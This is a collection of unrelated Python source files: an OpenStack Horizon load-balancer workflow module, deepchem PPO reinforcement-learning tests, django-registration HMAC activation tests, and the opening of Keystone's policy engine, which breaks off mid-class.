required=False, min_value=-1, label=_("Connection Limit"),
help_text=_("Maximum number of connections allowed "
"for the VIP or '-1' if the limit is not set"))
admin_state_up = forms.BooleanField(
label=_("Admin State"), initial=True, required=False)
def __init__(self, request, *args, **kwargs):
super(AddVipAction, self).__init__(request, *args, **kwargs)
self.fields['other_address'].label = _("Specify a free IP address"
" from %s") % args[0]['subnet']
protocol_choices = [('', _("Select a Protocol"))]
[protocol_choices.append((p, p)) for p in AVAILABLE_PROTOCOLS]
self.fields['protocol'].choices = protocol_choices
session_persistence_choices = [('', _("No Session Persistence"))]
for mode in ('SOURCE_IP', 'HTTP_COOKIE', 'APP_COOKIE'):
session_persistence_choices.append((mode.lower(), mode))
self.fields[
'session_persistence'].choices = session_persistence_choices
floatip_address_choices = [('', _("Currently Not Supported"))]
self.fields['floatip_address'].choices = floatip_address_choices
def clean(self):
cleaned_data = super(AddVipAction, self).clean()
persistence = cleaned_data.get('session_persistence')
if persistence:
cleaned_data['session_persistence'] = persistence.upper()
if (cleaned_data.get('session_persistence') == 'APP_COOKIE' and
not cleaned_data.get('cookie_name')):
msg = _('Cookie name is required for APP_COOKIE persistence.')
self._errors['cookie_name'] = self.error_class([msg])
return cleaned_data
class Meta:
name = _("Specify VIP")
permissions = ('openstack.services.network',)
help_text = _("Create a VIP for this pool. "
"Assign a name and description for the VIP. "
"Specify an IP address and port for the VIP. "
"Choose the protocol and session persistence "
"method for the VIP."
"Specify the max connections allowed. "
"Admin State is UP (checked) by default.")
class AddVipStep(workflows.Step):
action_class = AddVipAction
depends_on = ("pool_id", "subnet")
contributes = ("name", "description", "floatip_address",
"other_address", "protocol_port", "protocol",
"session_persistence", "cookie_name",
"connection_limit", "admin_state_up")
def contribute(self, data, context):
context = super(AddVipStep, self).contribute(data, context)
return context
class AddVip(workflows.Workflow):
slug = "addvip"
name = _("Add VIP")
finalize_button_name = _("Add")
success_message = _('Added VIP "%s".')
failure_message = _('Unable to add VIP "%s".')
success_url = "horizon:project:loadbalancers:index"
default_steps = (AddVipStep,)
def format_status_message(self, message):
name = self.context.get('name')
return message % name
def handle(self, request, context):
if context['other_address'] == '':
context['address'] = context['floatip_address']
else:
if not context['floatip_address'] == '':
self.failure_message = _('Only one address can be specified. '
'Unable to add VIP "%s".')
return False
else:
context['address'] = context['other_address']
try:
pool = api.lbaas.pool_get(request, context['pool_id'])
context['subnet_id'] = pool['subnet_id']
except Exception:
context['subnet_id'] = None
self.failure_message = _('Unable to retrieve the specified pool. '
'Unable to add VIP "%s".')
return False
if context['session_persistence']:
stype = context['session_persistence']
if stype == 'APP_COOKIE':
cookie = context['cookie_name']
context['session_persistence'] = {'type': stype,
'cookie_name': cookie}
else:
context['session_persistence'] = {'type': stype}
else:
context['session_persistence'] = {}
try:
api.lbaas.vip_create(request, **context)
return True
except Exception:
return False
class AddMemberAction(workflows.Action):
pool_id = forms.ChoiceField(label=_("Pool"))
members = forms.MultipleChoiceField(
label=_("Member(s)"),
required=True,
initial=["default"],
widget=forms.CheckboxSelectMultiple(),
error_messages={'required':
_('At least one member must be specified')},
help_text=_("Select members for this pool "))
weight = forms.IntegerField(max_value=256, min_value=0, label=_("Weight"),
required=False,
help_text=_("Relative part of requests this "
"pool member serves compared to others"))
protocol_port = forms.IntegerField(label=_("Protocol Port"), min_value=1,
help_text=_("Enter an integer value "
"between 1 and 65535."),
validators=[validators.validate_port_range])
admin_state_up = forms.BooleanField(label=_("Admin State"),
initial=True, required=False)
def __init__(self, request, *args, **kwargs):
super(AddMemberAction, self).__init__(request, *args, **kwargs)
pool_id_choices = [('', _("Select a Pool"))]
try:
tenant_id = self.request.user.tenant_id
pools = api.lbaas.pool_list(request, tenant_id=tenant_id)
except Exception:
pools = []
exceptions.handle(request,
_('Unable to retrieve pools list.'))
pools = sorted(pools,
key=lambda pool: pool.name)
for p in pools:
pool_id_choices.append((p.id, p.name))
self.fields['pool_id'].choices = pool_id_choices
members_choices = []
try:
servers, has_more = api.nova.server_list(request)
except Exception:
servers = []
exceptions.handle(request,
_('Unable to retrieve instances list.'))
if len(servers) == 0:
self.fields['members'].label = _(
"No servers available. To add a member, you "
"need at least one running instance.")
self.fields['members'].required = True
self.fields['members'].help_text = _("Select members "
"for this pool ")
self.fields['pool_id'].required = False
self.fields['protocol_port'].required = False
return
for m in servers:
members_choices.append((m.id, m.name))
self.fields['members'].choices = sorted(
members_choices,
key=lambda member: member[1])
class Meta:
name = _("Add New Member")
permissions = ('openstack.services.network',)
help_text = _("Add member to selected pool.\n\n"
"Choose one or more listed instances to be "
"added to the pool as member(s). "
"Assign a numeric weight for this member "
"Specify the port number the member(s) "
"operate on; e.g., 80.")
class AddMemberStep(workflows.Step):
action_class = AddMemberAction
contributes = ("pool_id", "members", "protocol_port", "weight",
"admin_state_up")
def contribute(self, data, context):
context = super(AddMemberStep, self).contribute(data, context)
return context
class AddMember(workflows.Workflow):
slug = "addmember"
name = _("Add Member")
finalize_button_name = _("Add")
success_message = _('Added member(s).')
failure_message = _('Unable to add member(s).')
success_url = "horizon:project:loadbalancers:index"
default_steps = (AddMemberStep,)
def handle(self, request, context):
for m in context['members']:
params = {'device_id': m}
try:
plist = api.neutron.port_list(request, **params)
except Exception:
return False
if plist:
context['address'] = plist[0].fixed_ips[0]['ip_address']
try:
context['member_id'] = api.lbaas.member_create(
request, **context).id
except Exception:
return False
return True
class AddMonitorAction(workflows.Action):
type = forms.ChoiceField(
label=_("Type"),
choices=[('ping', _('PING')),
('tcp', _('TCP')),
('http', _('HTTP')),
('https', _('HTTPS'))],
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'type'
}))
delay = forms.IntegerField(
min_value=1,
label=_("Delay"),
help_text=_("The minimum time in seconds between regular checks "
"of a member"))
timeout = forms.IntegerField(
min_value=1,
label=_("Timeout"),
help_text=_("The maximum time in seconds for a monitor to wait "
"for a reply"))
max_retries = forms.IntegerField(
max_value=10, min_value=1,
label=_("Max Retries (1~10)"),
help_text=_("Number of permissible failures before changing "
"the status of member to inactive"))
http_method = forms.ChoiceField(
initial="GET",
required=False,
choices=[('GET', _('GET'))],
label=_("HTTP Method"),
help_text=_("HTTP method used to check health status of a member"),
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'type',
'data-type-http': _('HTTP Method'),
'data-type-https': _('HTTP Method')
}))
url_path = forms.CharField(
initial="/",
required=False,
max_length=80,
label=_("URL"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'type',
'data-type-http': _('URL'),
'data-type-https': _('URL')
}))
expected_codes = forms.RegexField(
initial="200",
required=False,
max_length=80,
regex=r'^(\d{3}(\s*,\s*\d{3})*)$|^(\d{3}-\d{3})$',
label=_("Expected HTTP Status Codes"),
help_text=_("Expected code may be a single value (e.g. 200), "
"a list of values (e.g. 200, 202), "
"or range of values (e.g. 200-204)"),
widget=forms.TextInput(attrs={
'class': 'switched',
'data-switch-on': 'type',
'data-type-http': _('Expected HTTP Status Codes'),
'data-type-https': _('Expected HTTP Status Codes')
}))
admin_state_up = forms.BooleanField(label=_("Admin State"),
initial=True, required=False)
def __init__(self, request, *args, **kwargs):
super(AddMonitorAction, self).__init__(request, *args, **kwargs)
def clean(self):
cleaned_data = super(AddMonitorAction, self).clean()
type_opt = cleaned_data.get('type')
if type_opt in ['http', 'https']:
http_method_opt = cleaned_data.get('http_method')
url_path = cleaned_data.get('url_path')
expected_codes = cleaned_data.get('expected_codes')
if not http_method_opt:
msg = _('Please choose a HTTP method')
self._errors['http_method'] = self.error_class([msg])
if not url_path:
msg = _('Please specify an URL')
self._errors['url_path'] = self.error_class([msg])
if not expected_codes:
msg = _('Please enter a single value (e.g. 200), '
'a list of values (e.g. 200, 202), '
'or range of values (e.g. 200-204)')
self._errors['expected_codes'] = self.error_class([msg])
return cleaned_data
class Meta:
name = _("Add New Monitor")
permissions = ('openstack.services.network',)
help_text = _("Create a monitor template.\n\n"
"Select type of monitoring. "
"Specify delay, timeout, and retry limits "
"required by the monitor. "
"Specify method, URL path, and expected "
"HTTP codes upon success.")
class AddMonitorStep(workflows.Step):
action_class = AddMonitorAction
contributes = ("type", "delay", "timeout", "max_retries",
"http_method", "url_path", "expected_codes",
"admin_state_up")
def contribute(self, data, context):
context = super(AddMonitorStep, self).contribute(data, context)
if data:
return context
class AddMonitor(workflows.Workflow):
slug = "addmonitor"
name = _("Add Monitor")
finalize_button_name = _("Add")
success_message = _('Added monitor')
failure_message = _('Unable to add monitor')
success_url = "horizon:project:loadbalancers:index"
default_steps = (AddMonitorStep,)
def handle(self, request, context):
try:
context['monitor_id'] = api.lbaas.pool_health_monitor_create(
request, **context).get('id')
return True
except Exception:
exceptions.handle(request, _("Unable to add monitor."))
return False
class MonitorMixin():
def _get_monitor_display_name(self, monitor):
fields = ['type', 'delay', 'max_retries', 'timeout']
if monitor.type in ['HTTP', 'HTTPS']:
fields.extend(['url_path', 'expected_codes', 'http_method'])
name = _("%(type)s url:%(url_path)s "
"method:%(http_method)s codes:%(expected_codes)s "
"delay:%(delay)d retries:%(max_retries)d "
"timeout:%(timeout)d")
else:
name = _("%(type)s delay:%(delay)d "
"retries:%(max_retries)d "
"timeout:%(timeout)d")
params = dict((key, getattr(monitor, key)) for key in fields)
return name % params
class AddPMAssociationAction(workflows.Action, MonitorMixin):
monitor_id = forms.ChoiceField(label=_("Monitor"))
def __init__(self, request, *args, **kwargs):
super(AddPMAssociationAction, self).__init__(request, *args, **kwargs)
def populate_monitor_id_choices(self, request, context):
self.fields['monitor_id'].label = _("Select a monitor template "
"for %s") % context['pool_name']
monitor_id_choices = [('', _("Select a Monitor"))]
try:
tenant_id = self.request.user.tenant_id
monitors = api.lbaas.pool_health_monitor_list(request,
tenant_id=tenant_id)
for m in monitors:
if m.id not in context['pool_monitors']:
display_name = self._get_monitor_display_name(m)
monitor_id_choices.append((m.id, display_name))
except Exception:
exceptions.handle(request,
_('Unable to retrieve monitors list.'))
self.fields['monitor_id'].choices = monitor_id_choices
return monitor_id_choices
class Meta:
name = _("Association Details")
permissions = ('openstack.services.network',)
help_text = _("Associate a health monitor with target pool.")
class AddPMAssociationStep(workflows.Step):
action_class = AddPMAssociationAction
depends_on = ("pool_id", "pool_name", "pool_monitors")
contributes = ("monitor_id",)
def contribute(self, data, context):
context = super(AddPMAssociationStep, self).contribute(data, context)
if data:
return context
class AddPMAssociation(workflows.Workflow):
slug = "addassociation"
name = _("Associate Monitor")
finalize_button_name = _("Associate")
success_message = _('Associated monitor.')
failure_message = _('Unable to associate monitor.')
success_url = "horizon:project:loadbalancers:index"
default_steps = (AddPMAssociationStep,)
def handle(self, request, context):
try:
context['monitor_id'] = api.lbaas.pool_monitor_association_create(
request, **context)
return True
except Exception:
exceptions.handle(request, _("Unable to associate monitor."))
return False
class DeletePMAssociationAction(workflows.Action, MonitorMixin):
monitor_id = forms.ChoiceField(label=_("Monitor"))
def __init__(self, request, *args, **kwargs):
super(DeletePMAssociationAction, self).__init__(
request, *args, **kwargs)
def populate_monitor_id_choices(self, request, context):
self.fields['monitor_id'].label = (_("Select a health monitor of %s") %
context['pool_name'])
monitor_id_choices = [('', _("Select a Monitor"))]
try:
monitors = api.lbaas.pool_health_monitor_list(request)
for m in monitors:
if m.id in context['pool_monitors']:
display_name = self._get_monitor_display_name(m)
monitor_id_choices.append((m.id, display_name))
except Exception:
exceptions.handle(request,
_('Unable to retrieve monitors list.'))
self.fields['monitor_id'].choices = monitor_id_choices
return monitor_id_choices
class Meta:
name = _("Association Details")
permissions = ('openstack.services.network',)
help_text = _("Disassociate a health monitor from target pool. ")
class DeletePMAssociationStep(workflows.Step):
action_class = DeletePMAssociationAction
depends_on = ("pool_id", "pool_name", "pool_monitors")
contributes = ("monitor_id",)
def contribute(self, data, context):
context = super(DeletePMAssociationStep, self).contribute(
data, context)
if data:
return context
class DeletePMAssociation(workflows.Workflow):
slug = "deleteassociation"
name = _("Disassociate Monitor")
finalize_button_name = _("Disassociate")
success_message = _('Disassociated monitor.')
failure_message = _('Unable to disassociate monitor.')
success_url = "horizon:project:loadbalancers:index"
default_steps = (DeletePMAssociationStep,)
def handle(self, request, context):
try:
context['monitor_id'] = api.lbaas.pool_monitor_association_delete(
request, **context)
return True
except Exception:
exceptions.handle(request, _("Unable to disassociate monitor."))
return False
|
|
import pytest
from flaky import flaky
import deepchem as dc
from deepchem.models.optimizers import Adam, PolynomialDecay
from tensorflow.keras.layers import Input, Dense, GRU, Reshape, Softmax
import numpy as np
import tensorflow as tf
import unittest
class TestPPO(unittest.TestCase):
@flaky
def test_roulette(self):
"""Test training a policy for the roulette environment."""
# This is modeled after the Roulette-v0 environment from OpenAI Gym.
# The player can bet on any number from 0 to 36, or walk away (which ends the
# game). The average reward for any bet is slightly negative, so the best
# strategy is to walk away.
class RouletteEnvironment(dc.rl.Environment):
def __init__(self):
super(RouletteEnvironment, self).__init__([(1,)], 38)
self._state = [np.array([0])]
def step(self, action):
if action == 37:
self._terminated = True # Walk away.
return 0.0
wheel = np.random.randint(37)
if wheel == 0:
if action == 0:
return 35.0
return -1.0
if action != 0 and wheel % 2 == action % 2:
return 1.0
return -1.0
def reset(self):
self._terminated = False
env = RouletteEnvironment()
# This policy just learns a constant probability for each action, and a constant for the value.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
class TestModel(tf.keras.Model):
def __init__(self):
super(TestModel, self).__init__(**kwargs)
self.action = tf.Variable(np.ones(env.n_actions, np.float32))
self.value = tf.Variable([0.0], tf.float32)
def call(self, inputs, **kwargs):
prob = tf.nn.softmax(tf.reshape(self.action, (-1, env.n_actions)))
return (prob, self.value)
return TestModel()
# Optimize it.
ppo = dc.rl.PPO(
env,
TestPolicy(),
max_rollout_length=20,
optimizer=Adam(learning_rate=0.003))
ppo.fit(80000)
# It should have learned that the expected value is very close to zero, and that the best
# action is to walk away.
action_prob, value = ppo.predict([[0]])
assert -0.8 < value[0] < 0.5
assert action_prob.argmax() == 37
assert ppo.select_action([[0]], deterministic=True) == 37
# Verify that we can create a new PPO object, reload the parameters from the first one, and
# get the same result.
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.restore()
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
# Do the same thing, only using the "restore" argument to fit().
new_ppo = dc.rl.PPO(env, TestPolicy(), model_dir=ppo._model.model_dir)
new_ppo.fit(0, restore=True)
action_prob2, value2 = new_ppo.predict([[0]])
assert value2 == value
def test_recurrent_states(self):
"""Test a policy that involves recurrent layers."""
# The environment just has a constant state.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((10,), 10)
self._state = np.random.random(10).astype(np.float32)
def step(self, action):
self._state = np.random.random(10).astype(np.float32)
return 0.0
def reset(self):
pass
# The policy includes a single recurrent layer.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value', 'rnn_state'],
[np.zeros(10)])
def create_model(self, **kwargs):
state = Input(shape=(10,))
rnn_state = Input(shape=(10,))
reshaped = Reshape((1, 10))(state)
gru, rnn_final_state = GRU(
10, return_state=True, return_sequences=True, time_major=True)(
reshaped, initial_state=rnn_state)
output = Softmax()(Reshape((10,))(gru))
value = dc.models.layers.Variable([0.0])([state])
return tf.keras.Model(
inputs=[state, rnn_state], outputs=[output, value, rnn_final_state])
# We don't care about actually optimizing it, so just run a few rollouts to make
# sure fit() doesn't crash, then check the behavior of the GRU state.
env = TestEnvironment()
ppo = dc.rl.PPO(env, TestPolicy(), batch_size=0)
ppo.fit(100)
# On the first call, the initial state should be all zeros.
prob1, value1 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# It should still be zeros since we didn't save it last time.
prob2, value2 = ppo.predict(
env.state, use_saved_states=True, save_states=True)
# It should be different now.
prob3, value3 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# This should be the same as the previous one.
prob4, value4 = ppo.predict(
env.state, use_saved_states=True, save_states=False)
# Now we reset it, so we should get the same result as initially.
prob5, value5 = ppo.predict(
env.state, use_saved_states=False, save_states=True)
assert np.array_equal(prob1, prob2)
assert np.array_equal(prob1, prob5)
assert np.array_equal(prob3, prob4)
assert not np.array_equal(prob2, prob3)
@pytest.mark.slow
def test_hindsight(self):
"""Test Hindsight Experience Replay."""
# The environment is a plane in which the agent moves by steps until it reaches a randomly
# positioned goal. No reward is given until it reaches the goal. That makes it very hard
# to learn by standard methods, since it may take a very long time to receive any feedback
# at all. Using hindsight makes it much easier.
class TestEnvironment(dc.rl.Environment):
def __init__(self):
super(TestEnvironment, self).__init__((4,), 4)
self.moves = [(-1, 0), (1, 0), (0, -1), (0, 1)]
def reset(self):
self._state = np.concatenate([[0, 0], np.random.randint(-50, 50, 2)])
self._terminated = False
self.count = 0
def step(self, action):
new_state = self._state.copy()
new_state[:2] += self.moves[action]
self._state = new_state
self.count += 1
reward = 0
if np.array_equal(new_state[:2], new_state[2:]):
self._terminated = True
reward = 1
elif self.count == 1000:
self._terminated = True
return reward
def apply_hindsight(self, states, actions, goal):
new_states = []
rewards = []
goal_pos = goal[:2]
for state, action in zip(states, actions):
new_state = state.copy()
new_state[2:] = goal_pos
new_states.append(new_state)
pos_after_action = new_state[:2] + self.moves[action]
if np.array_equal(pos_after_action, goal_pos):
rewards.append(1)
break
else:
rewards.append(0)
return new_states, rewards
# A simple policy with two hidden layers.
class TestPolicy(dc.rl.Policy):
def __init__(self):
super(TestPolicy, self).__init__(['action_prob', 'value'])
def create_model(self, **kwargs):
state = Input(shape=(4,))
dense1 = Dense(8, activation=tf.nn.relu)(state)
dense2 = Dense(8, activation=tf.nn.relu)(dense1)
output = Dense(4, activation=tf.nn.softmax, use_bias=False)(dense2)
value = Dense(1)(dense2)
return tf.keras.Model(inputs=state, outputs=[output, value])
# Optimize it.
env = TestEnvironment()
learning_rate = PolynomialDecay(
initial_rate=0.0001, final_rate=0.00005, decay_steps=1500000)
ppo = dc.rl.PPO(
env,
TestPolicy(),
use_hindsight=True,
optimization_epochs=1,
batch_size=0,
optimizer=Adam(learning_rate=0.001))
ppo.fit(1500000)
# Try running it a few times and see if it succeeds.
pass_count = 0
for i in range(5):
env.reset()
while not env.terminated:
env.step(ppo.select_action(env.state))
if np.array_equal(env.state[:2], env.state[2:]):
pass_count += 1
assert pass_count >= 3
|
|
"""
Tests for the HMAC signed-token registration workflow.
"""
import datetime
import time
from django.conf import settings
from django.core import signing
from django.core.urlresolvers import reverse
from django.http import HttpRequest
from django.test import modify_settings, override_settings
from .. import signals
from registration.backends.hmac.views import REGISTRATION_SALT
from .base import ActivationTestCase
@modify_settings(INSTALLED_APPS={'remove': 'registration'})
@override_settings(ROOT_URLCONF='registration.backends.hmac.urls')
class HMACViewTests(ActivationTestCase):
"""
Tests for the signed-token registration workflow.
"""
def test_activation(self):
"""
Activation of an account functions properly.
"""
resp = self.client.post(
reverse('registration_register'),
data=self.valid_data
)
activation_key = signing.dumps(
obj=self.valid_data[self.user_model.USERNAME_FIELD],
salt=REGISTRATION_SALT
)
with self.assertSignalSent(signals.user_activated):
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
self.assertRedirects(resp, reverse('registration_activation_complete'))
def test_repeat_activation(self):
"""
Once activated, attempting to re-activate an account (even
with a valid key) does nothing.
"""
resp = self.client.post(
reverse('registration_register'),
data=self.valid_data
)
activation_key = signing.dumps(
obj=self.valid_data[self.user_model.USERNAME_FIELD],
salt=REGISTRATION_SALT
)
with self.assertSignalSent(signals.user_activated):
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
# First activation redirects to success.
self.assertRedirects(resp, reverse('registration_activation_complete'))
with self.assertSignalNotSent(signals.user_activated):
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
# Second activation fails.
self.assertEqual(200, resp.status_code)
self.assertTemplateUsed(resp, 'registration/activate.html')
# The timestamp calculation will error if USE_TZ=True, due to
# trying to subtract a naive from an aware datetime. Since time
# zones aren't relevant to the test, we just temporarily disable
# time-zone support rather than do the more complex dance of
# checking the setting and forcing everything to naive or aware.
@override_settings(USE_TZ=False)
def test_activation_expired(self):
"""
An expired account can't be activated.
"""
self.client.post(
reverse('registration_register'),
data=self.valid_data
)
# We need to create an activation key valid for the username,
# but with a timestamp > ACCOUNT_ACTIVATION_DAYS days in the
# past. This requires monkeypatching time.time() to return
# that timestamp, since TimestampSigner uses time.time().
#
# On Python 3.3+ this is much easier because of the
# timestamp() method of datetime objects, but since
# django-registration has to run on Python 2.7, we manually
# calculate it using a timedelta between the signup date and
# the UNIX epoch, and patch time.time() temporarily to return
# a date (ACCOUNT_ACTIVATION_DAYS + 1) days in the past.
user = self.user_model.objects.get(**self.user_lookup_kwargs)
joined_timestamp = (
user.date_joined - datetime.datetime.fromtimestamp(0)
).total_seconds()
expired_timestamp = (
joined_timestamp - (settings.ACCOUNT_ACTIVATION_DAYS + 1) * 86400
)
_old_time = time.time
try:
time.time = lambda: expired_timestamp
activation_key = signing.dumps(
obj=self.valid_data[self.user_model.USERNAME_FIELD],
salt=REGISTRATION_SALT
)
finally:
time.time = _old_time
with self.assertSignalNotSent(signals.user_activated):
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
self.assertEqual(200, resp.status_code)
self.assertTemplateUsed(resp, 'registration/activate.html')
def test_nonexistent_activation(self):
"""
A nonexistent username in an activation key will fail to
activate.
"""
activation_key = signing.dumps(
obj='parrot',
salt=REGISTRATION_SALT
)
with self.assertSignalNotSent(signals.user_activated):
resp = self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
self.assertEqual(200, resp.status_code)
self.assertTemplateUsed(resp, 'registration/activate.html')
def test_activation_signal(self):
self.client.post(
reverse('registration_register'),
data=self.valid_data
)
activation_key = signing.dumps(
obj=self.valid_data[self.user_model.USERNAME_FIELD],
salt=REGISTRATION_SALT
)
with self.assertSignalSent(signals.user_activated,
required_kwargs=['user', 'request']) as cm:
self.client.get(
reverse(
'registration_activate',
args=(),
kwargs={'activation_key': activation_key}
)
)
self.assertEqual(
getattr(cm.received_kwargs['user'],
self.user_model.USERNAME_FIELD),
self.valid_data[self.user_model.USERNAME_FIELD]
)
self.assertTrue(
isinstance(cm.received_kwargs['request'], HttpRequest)
)
|
|
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Policy Engine Implementation
Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.
In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass. These innermost lists are then
combined as with an "or" conjunction. This is the original way of
expressing policies, but there now exists a new way: the policy
language.
In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check. However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.
As an example, take the following rule, expressed in the list-of-lists
representation::
[["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]
In the policy language, this becomes::
role:admin or (project_id:%(project_id)s and role:projectadmin)
The policy language also has the "not" operator, allowing a richer
policy rule::
project_id:%(project_id)s and not role:dunce
Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access. (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.) Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""
import abc
import ast
import re
from oslo.config import cfg
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from keystone.openstack.common import fileutils
from keystone.openstack.common.gettextutils import _
from keystone.openstack.common import jsonutils
from keystone.openstack.common import log as logging
policy_opts = [
cfg.StrOpt('policy_file',
default='policy.json',
help=_('JSON file containing policy')),
cfg.StrOpt('policy_default_rule',
default='default',
help=_('Rule enforced when requested rule is not found')),
]
CONF = cfg.CONF
CONF.register_opts(policy_opts)
LOG = logging.getLogger(__name__)
_checks = {}
class PolicyNotAuthorized(Exception):
def __init__(self, rule):
msg = _("Policy doesn't allow %s to be performed.") % rule
super(PolicyNotAuthorized, self).__init__(msg)
class Rules(dict):
"""A store for rules. Handles the default_rule setting directly."""
@classmethod
def load_json(cls, data, default_rule=None):
"""Allow loading of JSON rule data."""
# Suck in the JSON data and parse the rules
rules = dict((k, parse_rule(v)) for k, v in
jsonutils.loads(data).items())
return cls(rules, default_rule)
def __init__(self, rules=None, default_rule=None):
"""Initialize the Rules store."""
super(Rules, self).__init__(rules or {})
self.default_rule = default_rule
def __missing__(self, key):
"""Implements the default rule handling."""
if isinstance(self.default_rule, dict):
raise KeyError(key)
# If the default rule isn't actually defined, do something
# reasonably intelligent
if not self.default_rule:
raise KeyError(key)
if isinstance(self.default_rule, BaseCheck):
return self.default_rule
# We need to check this or we can get infinite recursion
if self.default_rule not in self:
raise KeyError(key)
elif isinstance(self.default_rule, six.string_types):
return self[self.default_rule]
def __str__(self):
"""Dumps a string representation of the rules."""
# Start by building the canonical strings for the rules
out_rules = {}
for key, value in self.items():
# Use empty string for singleton TrueCheck instances
if isinstance(value, TrueCheck):
out_rules[key] = ''
else:
out_rules[key] = str(value)
# Dump a pretty-printed JSON representation
return jsonutils.dumps(out_rules, indent=4)
class Enforcer(object):
"""Responsible for loading and enforcing rules.
:param policy_file: Custom policy file to use, if none is
specified, `CONF.policy_file` will be
used.
:param rules: Default dictionary / Rules to use. It will be
considered just in the first instantiation. If
`load_rules(True)`, `clear()` or `set_rules(True)`
is called this will be overwritten.
:param default_rule: Default rule to use, CONF.default_rule will
be used if none is specified.
"""
def __init__(self, policy_file=None, rules=None, default_rule=None):
self.rules = Rules(rules, default_rule)
self.default_rule = default_rule or CONF.policy_default_rule
self.policy_path = None
self.policy_file = policy_file or CONF.policy_file
def set_rules(self, rules, overwrite=True):
"""Create a new Rules object based on the provided dict of rules.
:param rules: New rules to use. It should be an instance of dict.
:param overwrite: Whether to overwrite current rules or update them
with the new rules.
"""
if not isinstance(rules, dict):
raise TypeError(_("Rules must be an instance of dict or Rules, "
"got %s instead") % type(rules))
if overwrite:
self.rules = Rules(rules, self.default_rule)
else:
self.rules.update(rules)
def clear(self):
"""Clears Enforcer rules, policy's cache and policy's path."""
self.set_rules({})
self.default_rule = None
self.policy_path = None
def load_rules(self, force_reload=False):
"""Loads policy_path's rules.
Policy file is cached and will be reloaded if modified.
:param force_reload: Whether to overwrite current rules.
"""
if not self.policy_path:
self.policy_path = self._get_policy_path()
reloaded, data = fileutils.read_cached_file(self.policy_path,
force_reload=force_reload)
if reloaded or not self.rules:
rules = Rules.load_json(data, self.default_rule)
self.set_rules(rules)
LOG.debug(_("Rules successfully reloaded"))
def _get_policy_path(self):
"""Locate the policy json data file.
:param policy_file: Custom policy file to locate.
:returns: The policy path
:raises: ConfigFilesNotFoundError if the file couldn't
be located.
"""
policy_file = CONF.find_file(self.policy_file)
if policy_file:
return policy_file
raise cfg.ConfigFilesNotFoundError((self.policy_file,))
def enforce(self, rule, target, creds, do_raise=False,
exc=None, *args, **kwargs):
"""Checks authorization of a rule against the target and credentials.
:param rule: A string or BaseCheck instance specifying the rule
to evaluate.
:param target: As much information about the object being operated
on as possible, as a dictionary.
:param creds: As much information about the user performing the
action as possible, as a dictionary.
:param do_raise: Whether to raise an exception or not if check
fails.
:param exc: Class of the exception to raise if the check fails.
Any remaining arguments passed to check() (both
positional and keyword arguments) will be passed to
the exception class. If not specified, PolicyNotAuthorized
will be used.
:return: Returns False if the policy does not allow the action and
exc is not provided; otherwise, returns a value that
evaluates to True. Note: for rules using the "case"
expression, this True value will be the specified string
from the expression.
"""
# NOTE(flaper87): Not logging target or creds to avoid
# potential security issues.
LOG.debug(_("Rule %s will be now enforced") % rule)
self.load_rules()
# Allow the rule to be a Check tree
if isinstance(rule, BaseCheck):
result = rule(target, creds, self)
elif not self.rules:
# No rules to reference means we're going to fail closed
result = False
else:
try:
# Evaluate the rule
result = self.rules[rule](target, creds, self)
except KeyError:
LOG.debug(_("Rule [%s] doesn't exist") % rule)
# If the rule doesn't exist, fail closed
result = False
# If it is False, raise the exception if requested
if do_raise and not result:
if exc:
raise exc(*args, **kwargs)
raise PolicyNotAuthorized(rule)
return result
@six.add_metaclass(abc.ABCMeta)
class BaseCheck(object):
"""Abstract base class for Check classes."""
@abc.abstractmethod
def __str__(self):
"""String representation of the Check tree rooted at this node."""
pass
@abc.abstractmethod
def __call__(self, target, cred, enforcer):
"""Triggers if instance of the class is called.
Performs the check. Returns False to reject the access or a
true value (not necessary True) to accept the access.
"""
pass
class FalseCheck(BaseCheck):
"""A policy check that always returns False (disallow)."""
def __str__(self):
"""Return a string representation of this check."""
return "!"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return False
class TrueCheck(BaseCheck):
"""A policy check that always returns True (allow)."""
def __str__(self):
"""Return a string representation of this check."""
return "@"
def __call__(self, target, cred, enforcer):
"""Check the policy."""
return True
class Check(BaseCheck):
"""A base class to allow for user-defined policy checks."""
def __init__(self, kind, match):
"""Initiates Check instance.
:param kind: The kind of the check, i.e., the field before the
':'.
:param match: The match of the check, i.e., the field after
the ':'.
"""
